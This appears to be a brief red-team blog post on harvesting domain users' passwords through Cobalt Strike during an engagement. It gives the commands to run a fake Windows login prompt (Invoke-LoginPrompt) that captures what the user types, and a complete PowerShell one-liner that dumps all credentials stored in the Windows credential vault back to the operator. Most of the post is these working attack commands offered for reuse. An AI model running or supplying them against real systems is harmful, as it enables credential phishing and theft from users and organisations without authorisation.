Quick ways to get a domain user's password with Cobalt Strike

Recently on an engagement we used two useful tricks to get a user's credentials during a Red Team that might prove useful to you.

1. The first method is to create a login prompt which is well known. A PowerShell script to do this can be found here.

Simply import the script:

  powershell-import /path/to/Invoke-LoginPrompt.ps1
  powershell Invoke-LoginPrompt

Then a prompt will appear on the user's screen:

Once they have entered their password will be echoed back in Cobalt Strike output.

2. The second method for getting some user credentials is through using PowerShell to dump passwords stored in Internet Explorer's credential manager. In a corporate environment users are likely to have credentials stored for internal intranets, SAP, etc that could be useful.

It can be done using the following PowerShell one liner in Cobalt Strike:

powershell echo "Begin";[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $vault.RetrieveAll() | % { $_.RetrievePassword();echo $_; };echo "Done"

This will then dump the passwords it finds in the credential manager as can be seen below: